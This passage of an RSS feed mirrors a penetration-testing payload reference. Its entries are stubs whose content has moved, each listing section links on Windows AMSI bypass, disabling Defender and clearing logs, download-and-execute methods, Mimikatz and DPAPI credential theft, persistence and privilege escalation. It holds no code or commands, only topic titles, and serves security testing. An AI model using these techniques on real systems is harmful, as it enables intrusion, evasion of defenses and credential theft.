&lt;li&gt;&lt;a href="https://twitter.com/Th3G3nt3lman"&gt;@Th3G3nt3lman - Security Research &amp;amp; Bug bounty hunter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/thecybermentor"&gt;@thecybermentor - Offers cybersecurity and hacking courses&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/TomNomNom"&gt;@TomNomNom - security researcher, maintainer of many very useful pentesting tools&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Vulnerability Reports</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/vulnerability-reports/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/vulnerability-reports/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/"&gt;InternalAllTheThings/methodology/vulnerability-reports&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#vulnerability-report-structure"&gt;Vulnerability Report Structure&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#vulnerability-details-structure"&gt;Vulnerability Details Structure&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#general-guidelines"&gt;General Guidelines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Windows - AMSI Bypass</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-amsi-bypass/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-amsi-bypass/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/"&gt;InternalAllTheThings/redteam/evasion/windows-amsi-bypass&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#list-amsi-providers"&gt;List AMSI Providers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#which-endpoint-protection-is-using-amsi"&gt;Which Endpoint Protection is Using AMSI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse"&gt;Patching amsi.dll AmsiScanBuffer by rasta-mouse&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Dont-use-net-webclient"&gt;Dont use net webclient&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Amsi-ScanBuffer-Patch"&gt;Amsi ScanBuffer Patch from -&amp;gt; https://www.contextis.com/de/blog/amsi-bypass&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Forcing-an-error"&gt;Forcing an error&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Disable-Script-Logging"&gt;Disable Script Logging&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Amsi-Buffer-Patch---In-memory"&gt;Amsi Buffer Patch - In memory&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Same-as-6-but-integer-Bytes-instead-of-Base64"&gt;Same as 6 but integer Bytes instead of Base64&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Matt-Graebers-Reflection-method"&gt;Using Matt Graeber&amp;rsquo;s Reflection method&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Matt-Graebers-Reflection-method-with-WMF5-autologging-bypass"&gt;Using Matt Graeber&amp;rsquo;s Reflection method with WMF5 autologging bypass&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Matt-Graebers-second-Reflection-method"&gt;Using Matt Graeber&amp;rsquo;s second Reflection method&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Cornelis-de-Plaas-DLL-hijack-method%22"&gt;Using Cornelis de Plaa&amp;rsquo;s DLL hijack method&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-PowerShell-version-2"&gt;Use Powershell Version 2 - No AMSI Support there&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Nishang-all-in-one"&gt;Nishang all in one&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Adam-Chester-Patch"&gt;Adam Chesters Patch&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#amsifail"&gt;AMSI.fail&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Windows - Defenses</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-defenses/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-defenses/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/"&gt;InternalAllTheThings/redteam/evasion/windows-defenses&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#applocker"&gt;AppLocker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#user-account-control"&gt;User Account Control&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#dpapi"&gt;DPAPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#powershell"&gt;Powershell&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#anti-malware-scan-interface"&gt;Anti Malware Scan Interface&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#just-enough-administration"&gt;Just Enough Administration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#constrained-language-mode"&gt;Contrained Language Mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#script-block-logging"&gt;Script Block Logging&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#protected-process-light"&gt;Protected Process Light&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#credential-guard"&gt;Credential Guard&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#event-tracing-for-windows"&gt;Event Tracing for Windows&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-antivirus"&gt;Windows Defender Antivirus&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-application-control"&gt;Windows Defender Application Control&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-firewall"&gt;Windows Defender Firewall&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-information-protection"&gt;Windows Information Protection&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Windows - Download and execute methods</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-download-and-execute/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-download-and-execute/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/"&gt;InternalAllTheThings/redteam/access/windows-download-execute&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#downloaded-files-location"&gt;Downloaded files location&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#powershell"&gt;Powershell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#cmd"&gt;Cmd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#cscript-wscript"&gt;Cscript / Wscript&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#mshta"&gt;Mshta&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#rundll32"&gt;Rundll32&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#regasm-regsvc-subtee"&gt;Regasm / Regsvc&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#regsvr32"&gt;Regsvr32&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#odbcconf"&gt;Odbcconf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#msbuild"&gt;Msbuild&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#certutil"&gt;Certutil&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#bitsadmin"&gt;Bitsadmin&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Windows - DPAPI</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-dpapi/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-dpapi/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/"&gt;InternalAllTheThings/redteam/evasion/windows-dpapi&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#list-credential-files"&gt;List Credential Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#dpapi-localmachine-context"&gt;DPAPI LocalMachine Context&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#mimikatz---credential-manager--dpapi"&gt;Mimikatz - Credential Manager &amp;amp; DPAPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#hekatomb---steal-all-credentials-on-domain"&gt;Hekatomb - Steal all credentials on domain&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#donpapi---dumping-dpapi-credz-remotely"&gt;DonPAPI - Dumping DPAPI credz remotely&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Windows - Mimikatz</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-mimikatz/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-mimikatz/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/"&gt;InternalAllTheThings/cheatsheets/mimikatz&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#execute-commands"&gt;Execute commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#extract-passwords"&gt;Extract passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#lsa-protection-workaround"&gt;LSA Protection Workaround&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#mini-dump"&gt;Mini Dump&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#pass-the-hash"&gt;Pass The Hash&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#golden-ticket"&gt;Golden ticket&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#skeleton-key"&gt;Skeleton key&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#rdp-session-takeover"&gt;RDP Session Takeover&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#rdp-passwords"&gt;RDP Passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#credential-manager--dpapi"&gt;Credential Manager &amp;amp; DPAPI&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#chrome-cookies--credential"&gt;Chrome Cookies &amp;amp; Credential&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#task-scheduled-credentials"&gt;Task Scheduled credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#vault"&gt;Vault&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#commands-list"&gt;Commands list&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#powershell-version"&gt;Powershell version&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Windows - Persistence</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-persistence/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-persistence/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/"&gt;InternalAllTheThings/redteam/persistence/windows&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#hide-your-binary"&gt;Hide Your Binary&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#disable-antivirus-and-security"&gt;Disable Antivirus and Security&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#antivirus-removal"&gt;Antivirus Removal&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#disable-windows-defender"&gt;Disable Windows Defender&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#disable-windows-firewall"&gt;Disable Windows Firewall&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#clear-system-and-security-logs"&gt;Clear System and Security Logs&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#simple-user"&gt;Simple User&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#registry-hkcu"&gt;Registry HKCU&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#startup"&gt;Startup&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#scheduled-tasks-user"&gt;Scheduled Tasks User&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#bits-jobs"&gt;BITS Jobs&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#serviceland"&gt;Serviceland&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#iis"&gt;IIS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#windows-service"&gt;Windows Service&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#elevated"&gt;Elevated&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#registry-hklm"&gt;Registry HKLM&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#"&gt;Winlogon Helper DLL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#"&gt;GlobalFlag&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#startup-elevated"&gt;Startup Elevated&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#services-elevated"&gt;Services Elevated&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#scheduled-tasks-elevated"&gt;Scheduled Tasks Elevated&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#binary-replacement"&gt;Binary Replacement&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#binary-replacement-on-windows-xp"&gt;Binary Replacement on Windows XP+&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#binary-replacement-on-windows-10"&gt;Binary Replacement on Windows 10+&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#rdp-backdoor"&gt;RDP Backdoor&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#utilman.exe"&gt;utilman.exe&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#sethc.exe"&gt;sethc.exe&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#remote-desktop-services-shadowing"&gt;Remote Desktop Services Shadowing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#skeleton-key"&gt;Skeleton Key&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#virtual-machines"&gt;Virtual Machines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#windows-subsystem-for-linux"&gt;Windows Subsystem for Linux&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#domain"&gt;Domain&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#golden-certificate"&gt;Golden Certificate&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#golden-ticket"&gt;Golden Ticket&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Windows - Privilege Escalation</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-privilege-escalation/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/windows-privilege-escalation/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/"&gt;InternalAllTheThings/redteam/escalation/windows-privilege-escalation&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#windows-version-and-configuration"&gt;Windows Version and Configuration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#user-enumeration"&gt;User Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#network-enumeration"&gt;Network Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#antivirus-enumeration"&gt;Antivirus Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#default-writeable-folders"&gt;Default Writeable Folders&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---looting-for-passwords"&gt;EoP - Looting for passwords&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#sam-and-system-files"&gt;SAM and SYSTEM files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#hivenightmare"&gt;HiveNightmare&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#laps-settings"&gt;LAPS Settings&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#search-for-file-contents"&gt;Search for file contents&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#search-for-a-file-with-a-certain-filename"&gt;Search for a file with a certain filename&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#search-the-registry-for-key-names-and-passwords"&gt;Search the registry for key names and passwords&lt;/a&gt;&lt;/li&gt;
